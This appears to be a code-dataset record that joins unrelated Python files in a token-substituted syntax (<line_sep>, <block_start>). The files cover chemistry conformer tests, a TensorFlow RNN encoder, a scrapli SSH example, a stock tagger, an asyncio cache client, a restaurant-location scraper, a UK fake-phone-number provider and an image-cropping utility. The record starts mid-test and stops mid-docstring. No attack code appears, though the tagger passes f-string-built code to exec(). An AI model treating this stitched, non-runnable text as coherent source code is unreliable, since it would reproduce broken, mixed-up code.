conformer.duplicated_by=conformer.conformer_id+1<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_DUPLICATE_SAME_TOPOLOGY smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_duplicate_different_topology self<block_start>conformer=get_stage1_conformer()<line_sep># bond topology is conformer_id // 1000
conformer.duplicated_by=conformer.conformer_id+1000<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_DUPLICATE_DIFFERENT_TOPOLOGY smu_utils_lib.determine_fate(conformer))<block_end>@parameterized.parameters((2 dataset_pb2.Conformer.FATE_GEOMETRY_OPTIMIZATION_PROBLEM) (5 dataset_pb2.Conformer.FATE_DISASSOCIATED) (4 dataset_pb2.Conformer.FATE_FORCE_CONSTANT_FAILURE) (6 dataset_pb2.Conformer.FATE_DISCARDED_OTHER))<def_stmt>test_geometry_failures self nstat1 expected_fate<block_start>conformer=get_stage1_conformer()<line_sep>conformer.properties.errors.error_nstat1=nstat1<line_sep>self.assertEqual(expected_fate smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_no_result self<block_start>conformer=get_stage1_conformer()<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_NO_CALCULATION_RESULTS smu_utils_lib.determine_fate(conformer))<block_end>@parameterized.parameters((256 dataset_pb2.Conformer.FATE_CALCULATION_WITH_SERIOUS_ERROR) (50 dataset_pb2.Conformer.FATE_CALCULATION_WITH_MAJOR_ERROR) (4 dataset_pb2.Conformer.FATE_CALCULATION_WITH_MODERATE_ERROR))<def_stmt>test_calculation_errors self status expected<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.status=status<line_sep>self.assertEqual(expected smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_calculation_warnings_serious self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.warn_t1_excess=1234<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_CALCULATION_WITH_WARNING_SERIOUS smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_calculation_warnings_vibrational self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.warn_vib_linearity=1234<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_CALCULATION_WITH_WARNING_VIBRATIONAL smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_success self<block_start>conformer=get_stage2_conformer()<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_SUCCESS smu_utils_lib.determine_fate(conformer))<block_end><block_end><class_stmt>ToBondTopologySummaryTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.conformer=get_stage2_conformer()<block_end><def_stmt>test_dup_same self<block_start>self.conformer.fate=dataset_pb2.Conformer.FATE_DUPLICATE_SAME_TOPOLOGY<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 1)<line_sep>self.assertEqual(got[0].bond_topology.bond_topology_id self.conformer.bond_topologies[0].bond_topology_id)<line_sep>self.assertEqual(got[0].count_attempted_conformers 1)<line_sep>self.assertEqual(got[0].count_duplicates_same_topology 1)<block_end><def_stmt>test_dup_diff self<block_start>self.conformer.fate=(dataset_pb2.Conformer.FATE_DUPLICATE_DIFFERENT_TOPOLOGY)<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 1)<line_sep>self.assertEqual(got[0].count_attempted_conformers 1)<line_sep>self.assertEqual(got[0].count_duplicates_different_topology 1)<block_end><def_stmt>test_geometry_failed self<block_start>self.conformer.fate=(dataset_pb2.Conformer.FATE_DISCARDED_OTHER)<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 1)<line_sep>self.assertEqual(got[0].count_attempted_conformers 1)<line_sep>self.assertEqual(got[0].count_failed_geometry_optimization 1)<block_end><def_stmt>test_missing_calculation self<block_start>self.conformer.fate=dataset_pb2.Conformer.FATE_NO_CALCULATION_RESULTS<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 1)<line_sep>self.assertEqual(got[0].count_attempted_conformers 1)<line_sep>self.assertEqual(got[0].count_kept_geometry 1)<line_sep>self.assertEqual(got[0].count_missing_calculation 1)<block_end><def_stmt>test_calculation_with_error self<block_start>self.conformer.fate=(dataset_pb2.Conformer.FATE_CALCULATION_WITH_SERIOUS_ERROR)<line_sep>self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])<line_sep>self.conformer.bond_topologies[-1].bond_topology_id=123<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 2)<line_sep># We don't actually care about the order, but this is what comes out right
# now.
self.assertEqual(got[0].bond_topology.bond_topology_id 123)<line_sep>self.assertEqual(got[0].count_attempted_conformers 0)<line_sep>self.assertEqual(got[0].count_kept_geometry 0)<line_sep>self.assertEqual(got[0].count_calculation_with_error 0)<line_sep>self.assertEqual(got[0].count_detected_match_with_error 1)<line_sep>self.assertEqual(got[1].bond_topology.bond_topology_id self.conformer.bond_topologies[0].bond_topology_id)<line_sep>self.assertEqual(got[1].count_attempted_conformers 1)<line_sep>self.assertEqual(got[1].count_kept_geometry 1)<line_sep>self.assertEqual(got[1].count_calculation_with_error 1)<line_sep>self.assertEqual(got[1].count_detected_match_with_error 0)<block_end><def_stmt>test_calculation_success self<block_start>self.conformer.fate=dataset_pb2.Conformer.FATE_SUCCESS<line_sep>self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])<line_sep>self.conformer.bond_topologies[-1].bond_topology_id=123<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 2)<line_sep># We don't actually care about the order, but this is what comes out right
# now.
self.assertEqual(got[0].bond_topology.bond_topology_id 123)<line_sep>self.assertEqual(got[0].count_attempted_conformers 0)<line_sep>self.assertEqual(got[0].count_kept_geometry 0)<line_sep>self.assertEqual(got[0].count_calculation_success 0)<line_sep>self.assertEqual(got[0].count_detected_match_success 1)<line_sep>self.assertEqual(got[1].bond_topology.bond_topology_id self.conformer.bond_topologies[0].bond_topology_id)<line_sep>self.assertEqual(got[1].count_attempted_conformers 1)<line_sep>self.assertEqual(got[1].count_kept_geometry 1)<line_sep>self.assertEqual(got[1].count_calculation_success 1)<line_sep>self.assertEqual(got[1].count_detected_match_success 0)<block_end><block_end><class_stmt>LabeledSmilesTester(absltest.TestCase)<block_start><def_stmt>test_atom_labels self<block_start>mol=Chem.MolFromSmiles('FCON[NH2+][O-]' sanitize=<false>)<line_sep>self.assertIsNotNone(mol)<line_sep>smiles_before=Chem.MolToSmiles(mol)<line_sep>self.assertEqual(smu_utils_lib.labeled_smiles(mol) 'F[CH2:1][O:2][NH:3][NH2+:4][O-:5]')<line_sep># Testing both the atom numbers and the smiles is redundant,
# but guards against possible future changes.
<for_stmt>atom mol.GetAtoms()<block_start>self.assertEqual(atom.GetAtomMapNum() 0)<block_end>self.assertEqual(Chem.MolToSmiles(mol) smiles_before)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>absltest.main()<block_end> |
<import_stmt>tensorflow<as>tf<def_stmt>single_rnn_cell units:int cell_type:str="gru" name:str=<none><block_start><if_stmt>cell_type<eq>"gru"# Masking is not supported for CuDNN RNNs
<block_start><return>tf.keras.layers.GRU(units return_sequences=<true> return_state=<true> name=name)<block_end><elif_stmt>cell_type<eq>"cudnn_gru"<block_start><return>tf.compat.v1.keras.layers.CuDNNGRU(units return_sequences=<true> return_state=<true> name=name)<block_end><elif_stmt>cell_type<eq>"gru_cell"#return tf.keras.layers.GRUCell(
# units,
# name=name
#)
# Use this for decoder
<block_start><return>tf.nn.rnn_cell.GRUCell(units name=name)<block_end><else_stmt><block_start><raise>ValueError<block_end><block_end><class_stmt>RnnEncoder(tf.keras.layers.Layer)<block_start><def_stmt>__init__ self units:int cell_type:str="gru" name:str=<none><block_start>super().__init__(name=name)<line_sep>self._units=units<line_sep>self._cell_type=cell_type<line_sep>self._name=name<block_end><def_stmt>build self input_shape<block_start>rnn_cell=single_rnn_cell(self._units self._cell_type)<line_sep>self.birnn_cell=tf.keras.layers.Bidirectional(rnn_cell)<line_sep>super().build(input_shape)<block_end><def_stmt>call self x initial_state=<none><block_start>outputs,fw_state,bw_state=self.birnn_cell(x initial_state=initial_state)<line_sep><return>outputs fw_state bw_state<block_end><def_stmt>compute_output_shape self input_shape<block_start>shape=tf.TensorShape(input_shape).as_list()<line_sep>batch_size=shape[0]<line_sep>shape[-1]=self._units<times>2<line_sep><return>[tf.TensorShape(shape) tf.TensorShape([batch_size self._units]) tf.TensorShape([batch_size self._units])]<block_end><def_stmt>get_config self<block_start><return>{"units":self._units "cell_type":self._cell_type}<block_end><def_stmt>compute_mask self inputs mask<block_start><return>self.birnn_cell.compute_mask(inputs mask)<block_end><block_end> |
"""PatchmatchNet dataset module
reference: https://github.com/FangjinhuaWang/PatchmatchNet
"""<line_sep> |
"""examples.basic_usage.generic_driver"""<import_from_stmt>scrapli.driver GenericDriver<line_sep>MY_DEVICE={"host":"172.18.0.11" "auth_username":"scrapli" "auth_password":"<PASSWORD>" "auth_strict_key":<false> }<def_stmt>main <block_start>"""Simple example of connecting to an IOSXEDevice with the GenericDriver"""<line_sep># the `GenericDriver` is a good place to start if your platform is not supported by a "core"
# platform drivers
conn=GenericDriver(**MY_DEVICE)<line_sep>conn.open()<line_sep>print(conn.channel.get_prompt())<line_sep>print(conn.send_command("show run | i hostname").result)<line_sep># IMPORTANT: paging is NOT disabled w/ GenericDriver driver!
conn.send_command("terminal length 0")<line_sep>print(conn.send_command("show run").result)<line_sep>conn.close()<line_sep># Context manager is a great way to use scrapli, it will auto open/close the connection for you:
<with_stmt>GenericDriver(**MY_DEVICE)<as>conn<block_start>result=conn.send_command("show run | i hostname")<block_end>print(result.result)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end> |
# -*- coding: utf-8 -*-
<import_stmt>logging<import_from_stmt>typing Type<import_stmt>pandas<as>pd<import_from_stmt>zvt.contract Mixin<import_from_stmt>zvt.contract TradableEntity<import_from_stmt>zvt.contract.api get_db_session<import_from_stmt>zvt.contract.base OneStateService<import_from_stmt>zvt.contract.zvt_info TaggerState<import_from_stmt>zvt.domain Stock Index<import_from_stmt>zvt.tag.dataset.stock_tags StockTags<import_from_stmt>zvt.utils to_time_str to_pd_timestamp<import_from_stmt>zvt.utils.time_utils TIME_FORMAT_DAY now_pd_timestamp<line_sep>logger=logging.getLogger(__name__)<class_stmt>Tagger(OneStateService)<block_start>state_schema=TaggerState<line_sep>entity_schema:Type[TradableEntity]=<none><line_sep>data_schema:Type[Mixin]=<none><line_sep>start_timestamp="2005-01-01"<def_stmt>__init__ self force=<false><arrow><none><block_start>super().__init__()<assert_stmt>self.entity_schema<is><not><none><assert_stmt>self.data_schema<is><not><none><line_sep>self.force=force<line_sep>self.session=get_db_session(provider="zvt" data_schema=self.data_schema)<if_stmt>self.state<and><not>self.force<block_start>logger.info(f"get start_timestamp from state")<line_sep>self.start_timestamp=self.state["current_timestamp"]<block_end>logger.info(f"tag start_timestamp: {self.start_timestamp}")<block_end><def_stmt>tag self timestamp<block_start><raise>NotImplementedError<block_end><def_stmt>get_tag_timestamps self<block_start><return>pd.date_range(start=self.start_timestamp end=now_pd_timestamp() freq="M")<block_end><def_stmt>get_tag_domain self entity_id timestamp **fill_kv<block_start>the_date=to_time_str(timestamp fmt=TIME_FORMAT_DAY)<line_sep>the_id=f"{entity_id}_{the_date}"<line_sep>the_domain=self.data_schema.get_one(id=the_id)<if_stmt>the_domain<block_start><for_stmt>k,v fill_kv.items()<block_start>exec(f"the_domain.{k}=v")<block_end><block_end><else_stmt><block_start><return>self.data_schema(id=the_id entity_id=entity_id timestamp=to_pd_timestamp(the_date) **fill_kv)<block_end><return>the_domain<block_end><def_stmt>get_tag_domains self entity_ids timestamp **fill_kv<block_start>the_date=to_time_str(timestamp fmt=TIME_FORMAT_DAY)<line_sep>ids=[f"{entity_id}_{the_date}"<for>entity_id entity_ids]<line_sep>the_domains=self.data_schema.query_data(ids=ids return_type="domain")<if_stmt>the_domains<block_start><for_stmt>the_domain the_domains<block_start><for_stmt>k,v fill_kv.items()<block_start>exec(f"the_domain.{k}=v")<block_end><block_end><block_end>current_ids=[item.id<for>item the_domains]<line_sep>need_new_ids=set(ids)-set(current_ids)<line_sep>new_domains=[self.data_schema(id=f"{entity_id}_{the_date}" entity_id=entity_id timestamp=to_pd_timestamp(the_date) **fill_kv)<for>entity_id need_new_ids]<line_sep><return>the_domains+new_domains<block_end><def_stmt>run self<block_start>timestamps=self.get_tag_timestamps()<for_stmt>timestamp timestamps<block_start>logger.info(f"tag to {timestamp}")<line_sep>self.tag(timestamp=timestamp)<line_sep>self.state={"current_timestamp":to_time_str(timestamp)}<line_sep>self.persist_state()<block_end><block_end><block_end><class_stmt>StockTagger(Tagger)<block_start>data_schema=StockTags<line_sep>entity_schema=Stock<def_stmt>tag self timestamp<block_start><raise>NotImplementedError<block_end><block_end><class_stmt>IndexTagger(Tagger)<block_start>data_schema=StockTags<line_sep>entity_schema=Index<def_stmt>tag self timestamp<block_start><raise>NotImplementedError<block_end><block_end># the __all__ is generated
__all__=["Tagger" "StockTagger" "IndexTagger"]<line_sep> |
"""Client for cache server.
See cachesvr.py for protocol description.
"""<import_stmt>argparse<import_stmt>asyncio<import_from_stmt>asyncio test_utils<import_stmt>json<import_stmt>logging<line_sep>ARGS=argparse.ArgumentParser(description='Cache client example.')<line_sep>ARGS.add_argument('--tls' action='store_true' dest='tls' default=<false> help='Use TLS')<line_sep>ARGS.add_argument('--iocp' action='store_true' dest='iocp' default=<false> help='Use IOCP event loop (Windows only)')<line_sep>ARGS.add_argument('--host' action='store' dest='host' default='localhost' help='Host name')<line_sep>ARGS.add_argument('--port' action='store' dest='port' default=54321 type=int help='Port number')<line_sep>ARGS.add_argument('--timeout' action='store' dest='timeout' default=5 type=float help='Timeout')<line_sep>ARGS.add_argument('--max_backoff' action='store' dest='max_backoff' default=5 type=float help='Max backoff on reconnect')<line_sep>ARGS.add_argument('--ntasks' action='store' dest='ntasks' default=10 type=int help='Number of tester tasks')<line_sep>ARGS.add_argument('--ntries' action='store' dest='ntries' default=5 type=int help='Number of request tries before giving up')<line_sep>args=ARGS.parse_args()<class_stmt>CacheClient<block_start>"""Multiplexing cache client.
This wraps a single connection to the cache client. The
connection is automatically re-opened when an error occurs.
Multiple tasks may share this object; the requests will be
serialized.
The public API is get(), set(), delete() (all are coroutines).
"""<def_stmt>__init__ self host port sslctx=<none> loop=<none><block_start>self.host=host<line_sep>self.port=port<line_sep>self.sslctx=sslctx<line_sep>self.loop=loop<line_sep>self.todo=set()<line_sep>self.initialized=<false><line_sep>self.task=asyncio.Task(self.activity() loop=self.loop)<block_end>@asyncio.coroutine<def_stmt>get self key<block_start>resp=<yield><from>self.request('get' key)<if_stmt>resp<is><none><block_start><return><none><block_end><return>resp.get('value')<block_end>@asyncio.coroutine<def_stmt>set self key value<block_start>resp=<yield><from>self.request('set' key value)<if_stmt>resp<is><none><block_start><return><false><block_end><return>resp.get('status')<eq>'ok'<block_end>@asyncio.coroutine<def_stmt>delete self key<block_start>resp=<yield><from>self.request('delete' key)<if_stmt>resp<is><none><block_start><return><false><block_end><return>resp.get('status')<eq>'ok'<block_end>@asyncio.coroutine<def_stmt>request self type key value=<none><block_start><assert_stmt><not>self.task.done()<line_sep>data={'type':type 'key':key}<if_stmt>value<is><not><none><block_start>data['value']=value<block_end>payload=json.dumps(data).encode('utf8')<line_sep>waiter=asyncio.Future(loop=self.loop)<if_stmt>self.initialized<block_start><try_stmt><block_start><yield><from>self.send(payload waiter)<block_end><except_stmt>IOError<block_start>self.todo.add((payload waiter))<block_end><block_end><else_stmt><block_start>self.todo.add((payload waiter))<block_end><return>(<yield><from>waiter)<block_end>@asyncio.coroutine<def_stmt>activity self<block_start>backoff=0<while_stmt><true><block_start><try_stmt><block_start>self.reader,self.writer=<yield><from>asyncio.open_connection(self.host self.port ssl=self.sslctx loop=self.loop)<block_end><except_stmt>Exception<as>exc<block_start>backoff=min(args.max_backoff backoff+(backoff<floordiv>2)+1)<line_sep>logging.info('Error connecting: %r; sleep %s' exc backoff)<line_sep><yield><from>asyncio.sleep(backoff loop=self.loop)<line_sep><continue><block_end>backoff=0<line_sep>self.next_id=0<line_sep>self.pending={}<line_sep>self.initialized=<true><try_stmt><block_start><while_stmt>self.todo<block_start>payload,waiter=self.todo.pop()<if_stmt><not>waiter.done()<block_start><yield><from>self.send(payload waiter)<block_end><block_end><while_stmt><true><block_start>resp_id,resp=<yield><from>self.process()<if_stmt>resp_id<in>self.pending<block_start>payload,waiter=self.pending.pop(resp_id)<if_stmt><not>waiter.done()<block_start>waiter.set_result(resp)<block_end><block_end><block_end><block_end><except_stmt>Exception<as>exc<block_start>self.initialized=<false><line_sep>self.writer.close()<while_stmt>self.pending<block_start>req_id,pair=self.pending.popitem()<line_sep>payload,waiter=pair<if_stmt><not>waiter.done()<block_start>self.todo.add(pair)<block_end><block_end>logging.info('Error processing: %r' exc)<block_end><block_end><block_end>@asyncio.coroutine<def_stmt>send self payload waiter<block_start>self.next_id<augadd>1<line_sep>req_id=self.next_id<line_sep>frame='request %d %d\n'%(req_id len(payload))<line_sep>self.writer.write(frame.encode('ascii'))<line_sep>self.writer.write(payload)<line_sep>self.pending[req_id]=payload waiter<line_sep><yield><from>self.writer.drain()<block_end>@asyncio.coroutine<def_stmt>process self<block_start>frame=<yield><from>self.reader.readline()<if_stmt><not>frame<block_start><raise>EOFError()<block_end>head,tail=frame.split(<none> 1)<if_stmt>head<eq>b'error'<block_start><raise>IOError('OOB error: %r'%tail)<block_end><if_stmt>head<ne>b'response'<block_start><raise>IOError('Bad frame: %r'%frame)<block_end>resp_id,resp_size=map(int tail.split())<line_sep>data=<yield><from>self.reader.readexactly(resp_size)<if_stmt>len(data)<ne>resp_size<block_start><raise>EOFError()<block_end>resp=json.loads(data.decode('utf8'))<line_sep><return>resp_id resp<block_end><block_end><def_stmt>main <block_start>asyncio.set_event_loop(<none>)<if_stmt>args.iocp<block_start><import_from_stmt>asyncio.windows_events ProactorEventLoop<line_sep>loop=ProactorEventLoop()<block_end><else_stmt><block_start>loop=asyncio.new_event_loop()<block_end>sslctx=<none><if_stmt>args.tls<block_start>sslctx=test_utils.dummy_ssl_context()<block_end>cache=CacheClient(args.host args.port sslctx=sslctx loop=loop)<try_stmt><block_start>loop.run_until_complete(asyncio.gather(*[testing(i cache loop)<for>i range(args.ntasks)] loop=loop))<block_end><finally_stmt><block_start>loop.close()<block_end><block_end>@asyncio.coroutine<def_stmt>testing label cache loop<block_start><def_stmt>w g<block_start><return>asyncio.wait_for(g args.timeout loop=loop)<block_end>key='foo-%s'%label<while_stmt><true><block_start>logging.info('%s %s' label '-'<times>20)<try_stmt><block_start>ret=<yield><from>w(cache.set(key 'hello-%s-world'%label))<line_sep>logging.info('%s set %s' label ret)<line_sep>ret=<yield><from>w(cache.get(key))<line_sep>logging.info('%s get %s' label ret)<line_sep>ret=<yield><from>w(cache.delete(key))<line_sep>logging.info('%s del %s' label ret)<line_sep>ret=<yield><from>w(cache.get(key))<line_sep>logging.info('%s get2 %s' label ret)<block_end><except_stmt>asyncio.TimeoutError<block_start>logging.warn('%s Timeout' label)<block_end><except_stmt>Exception<as>exc<block_start>logging.exception('%s Client exception: %r' label exc)<line_sep><break><block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>logging.basicConfig(level=logging.INFO)<line_sep>main()<block_end> |
# -*- coding: utf-8 -*-
<import_stmt>json<import_stmt>re<import_stmt>scrapy<import_from_stmt>locations.items GeojsonPointItem<import_from_stmt>locations.hours OpeningHours<class_stmt>HopdoddyBurgerBarSpider(scrapy.Spider)<block_start>name="hopdoddy_burger_bar"<line_sep>allowed_domains=["amazonaws.com"]<def_stmt>start_requests self<block_start>base_url="https://na6c0i4fb0.execute-api.us-west-2.amazonaws.com/restaurants/near?lat={lat}3&long={lon}"<with_stmt>open('./locations/searchable_points/us_centroids_25mile_radius.csv')<as>points<block_start>next(points)# Ignore the header
<for_stmt>point points<block_start>_,lat,lon=point.strip().split(',')<line_sep>url=base_url.format(lat=lat lon=lon)<line_sep><yield>scrapy.http.Request(url callback=self.parse)<block_end><block_end><block_end><def_stmt>parse self response<block_start>data=json.loads(response.body_as_unicode())<for_stmt>place data["restaurants"]<block_start>properties={'ref':place["id"] 'name':place["name"] 'addr_full':place["streetaddress"] 'city':place["city"] 'state':place["state"] 'postcode':place["zip"] 'country':place["country"] 'lat':place["latitude"] 'lon':place["longitude"] 'phone':place["telephone"]}<line_sep><yield>GeojsonPointItem(**properties)<block_end><block_end><block_end> |
<import_from_stmt>.. Provider<as>PhoneNumberProvider<class_stmt>Provider(PhoneNumberProvider)# Source:
# https://en.wikipedia.org/wiki/Telephone_numbers_in_the_United_Kingdom
# Fake phone numbers should be fake - this provider has been rewritten to
# use numbers reserved for dramatic use by Ofcom. See the following:
# https://en.wikipedia.org/wiki/Fictitious_telephone_number#United_Kingdom
# This ensures no genuine numbers are generated at random.
#
# It's worth noting that the following examples include incorrect notation
# of British phone numbers. +44(0)xxx is incorrect and the '(0)' should
# be omitted. However, it's commonly written this way by Joe Public
# and would better serve this project to be included, as it represents
# more realistic data and is of benefit to those developing data cleansing
# tools etc. All possible official fake numbers are covered below.
<block_start>cellphone_formats=('07700 900 ###' '07700 900###' '07700900###' '(07700) 900 ###' '(07700) 900###' '(07700)900###' '+447700 900 ###' '+447700 900###' '+447700900###' '+44(0)7700 900 ###' '+44(0)7700 900###' '+44(0)7700900###' )<line_sep>formats=('0113 496 0###' '0113 4960###' '01134960###' '(0113) 496 0###' '(0113) 4960###' '(0113)4960###' '+44113 496 0###' '+44113 4960###' '+441134960###' '+44(0)113 496 0###' '+44(0)113 4960###' '+44(0)1134960###' '0114 496 0###' '0114 4960###' '01144960###' '(0114) 496 0###' '(0114) 4960###' '(0114)4960###' '+44114 496 0###' '+44114 4960###' '+441144960###' '+44(0)114 496 0###' '+44(0)114 4960###' '+44(0)1144960###' '0115 496 0###' '0115 4960###' '01154960###' '(0115) 496 0###' '(0115) 4960###' '(0115)4960###' '+44115 496 0###' '+44115 4960###' '+441154960###' '+44(0)115 496 0###' '+44(0)115 4960###' '+44(0)1154960###' '0116 496 0###' '0116 4960###' '01164960###' '(0116) 496 0###' '(0116) 4960###' '(0116)4960###' '+44116 496 0###' '+44116 4960###' '+441164960###' '+44(0)116 496 0###' '+44(0)116 4960###' '+44(0)1164960###' '0117 496 0###' '0117 4960###' '01174960###' '(0117) 496 0###' '(0117) 4960###' '(0117)4960###' '+44117 496 0###' '+44117 4960###' '+441174960###' '+44(0)117 496 0###' '+44(0)117 4960###' '+44(0)1174960###' '0118 496 0###' '0118 4960###' '01184960###' '(0118) 496 0###' '(0118) 4960###' '(0118)4960###' '+44118 496 0###' '+44118 4960###' '+441184960###' '+44(0)118 496 0###' '+44(0)118 4960###' '+44(0)1184960###' '0121 496 0###' '0121 4960###' '01214960###' '(0121) 496 0###' '(0121) 4960###' '(0121)4960###' '+44121 496 0###' '+44121 4960###' '+441214960###' '+44(0)121 496 0###' '+44(0)121 4960###' '+44(0)1214960###' '0131 496 0###' '0131 4960###' '01314960###' '(0131) 496 0###' '(0131) 4960###' '(0131)4960###' '+44131 496 0###' '+44131 4960###' '+441314960###' '+44(0)131 496 0###' '+44(0)131 4960###' '+44(0)1314960###' '0141 496 0###' '0141 4960###' '01414960###' '(0141) 496 0###' '(0141) 4960###' '(0141)4960###' '+44141 496 0###' '+44141 4960###' '+441414960###' '+44(0)141 496 0###' '+44(0)141 4960###' '+44(0)1414960###' '0151 496 0###' '0151 4960###' '01514960###' '(0151) 496 0###' '(0151) 4960###' '(0151)4960###' '+44151 496 0###' '+44151 4960###' '+441514960###' '+44(0)151 496 0###' '+44(0)151 4960###' '+44(0)1514960###' '0161 496 0###' '0161 4960###' '01614960###' '(0161) 496 0###' '(0161) 4960###' '(0161)4960###' '+44161 496 0###' '+44161 4960###' '+441614960###' '+44(0)161 496 0###' '+44(0)161 4960###' '+44(0)1614960###' '0191 498 0###' '0191 4960###' '01914960###' '(0191) 496 0###' '(0191) 4960###' '(0191)4960###' '+44191 496 0###' '+44191 4960###' '+441914960###' '+44(0)191 496 0###' '+44(0)191 4960###' '+44(0)1914960###' '020 7946 0###' '020 74960###' '02074960###' '(020) 7496 0###' '(020) 74960###' '(020)74960###' '+4420 7496 0###' '+4420 74960###' '+442074960###' '+44(0)20 7496 0###' '+44(0)20 74960###' '+44(0)2074960###' '028 9018 0###' '028 9018###' '0289018###' '(028) 9018 0###' '(028) 9018###' '(028)9018###' '+4428 9018 0###' '+4428 9018###' '+44289018###' '+44(0)28 9018 0###' '+44(0)28 9018###' '+44(0)289018###' '029 2018 0###' '029 2018###' '0292018###' '(029) 2018 0###' '(029) 2018###' '(029)2018###' '+4429 2018 0###' '+4429 2018###' '+44292018###' '+44(0)29 2018 0###' '+44(0)29 2018###' '+44(0)292018###' '01632 960 ###' '01632 960###' '01632960###' '(01632) 960 ###' '(01632) 960###' '(01632)960###' '+441632 960 ###' '+441632 960###' '+441632960###' '+44(0)1632 960 ###' '+44(0)1632 960###' '+44(0)1632960###' '0306 999 0###' '0306 9990###' '03069990###' '(0306) 999 0###' '(0306) 9990###' '(0306)9990###' '+44306 999 0###' '+44306 9990###' '+443069990###' '+44(0)306 999 0###' '+44(0)306 9990###' '+44(0)3069990###' '0808 157 0###' '0808 1570###' '08081570###' '(0808) 157 0###' '(0808) 1570###' '(0808)1570###' '+44808 157 0###' '+44808 1570###' '+448081570###' '+44(0)808 157 0###' '+44(0)808 1570###' '+44(0)8081570###' '0909 879 0###' '0909 8790###' '09098790###' '(0909) 879 0###' '(0909) 8790###' '(0909)8790###' '+44909 879 0###' '+44909 8790###' '+449098790###' '+44(0)909 879 0###' '+44(0)909 8790###' '+44(0)9098790###' )<def_stmt>cellphone_number self<arrow>str<block_start>pattern:str=self.random_element(self.cellphone_formats)<line_sep><return>self.numerify(self.generator.parse(pattern))<block_end><block_end> |
# coding=utf-8
""" The mfbot Python3 CLI script """<import_from_stmt>mfbot MFBot<def_stmt>main <arrow><none><block_start>""" Main function to start things up for the command line use of mfbot """<line_sep>mfbot=MFBot()<line_sep>mfbot.parse_args()<if_stmt>mfbot.dir<block_start>yara_rule_output=mfbot.dir_run()<if_stmt>len(yara_rule_output)<g>0<block_start>mfbot.print_yara_rule(yara_rule_output)<block_end><else_stmt><block_start>print("No images found within that directory")<block_end><block_end><else_stmt><block_start>yara_rule_output=mfbot.run()<if_stmt>len(yara_rule_output)<g>0<block_start>mfbot.print_yara_rule(yara_rule_output)<block_end><else_stmt><block_start>print('No image found.')<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end> |
# Copyright 2018 University of Basel, Center for medical Image Analysis and Navigation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>os<import_stmt>multiprocessing<as>mp<line_sep>os.environ["ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS"]=str(mp.cpu_count())<import_stmt>SimpleITK<as>sitk<import_stmt>numpy<as>np<import_stmt>torch<as>th<import_from_stmt>.image Image<def_stmt>auto_crop_image_filter image boundary_value=0<block_start>"""
Performs an auto cropping of values on boundary
image (Image): image which has to be cropped
boundary_value (float|int): specifies the boundary value which will be cropped
return (Image): a new image with cropped boundary
"""<line_sep>msk=1-(image.image.squeeze()<eq>boundary_value)<line_sep>rminmax=[]<for_stmt>d range(len(msk.shape))<block_start>region=msk.argmax(dim=d).nonzero()<line_sep>rminmax.append((region.min(dim=0)[0] region.max(dim=0)[0]))<line_sep>#print(rminmax[-1])
<block_end><if_stmt>image.ndim<eq>2<block_start>cropped=image.image.squeeze()[rminmax[1][0]:rminmax[1][1] rminmax[0][0]:rminmax[0][1]]<line_sep>origin=image.origin+th.Tensor(image.spacing)<times>th.Tensor([rminmax[1][0] rminmax[0][0]])<block_end><elif_stmt>image.ndim<eq>3<block_start>cropped=image.image.squeeze()[rminmax[1][0][0]:rminmax[1][1][0] rminmax[0][0][0]:rminmax[0][1][0] rminmax[0][0][1]:rminmax[0][1][1]]<line_sep>#print(cropped.shape)
origin=th.Tensor(image.origin)+th.Tensor(image.spacing)<times>th.Tensor([rminmax[1][0][0] rminmax[0][0][0] rminmax[0][0][1]])<block_end><else_stmt><block_start><raise>Exception("Only 2 and 3 space dimensions supported")<block_end>size=tuple(cropped.shape)<line_sep>cropped.unsqueeze_(0).unsqueeze_(0)<line_sep><return>Image(cropped size image.spacing origin.tolist())<block_end><def_stmt>normalize_images fixed_image moving_image<block_start>"""
Noramlize image intensities by extracting joint minimum and dividing by joint maximum
Note: the function is inplace
fixed_image (Image): fixed image
moving_image (Image): moving image
return (Image, Image): normalized images
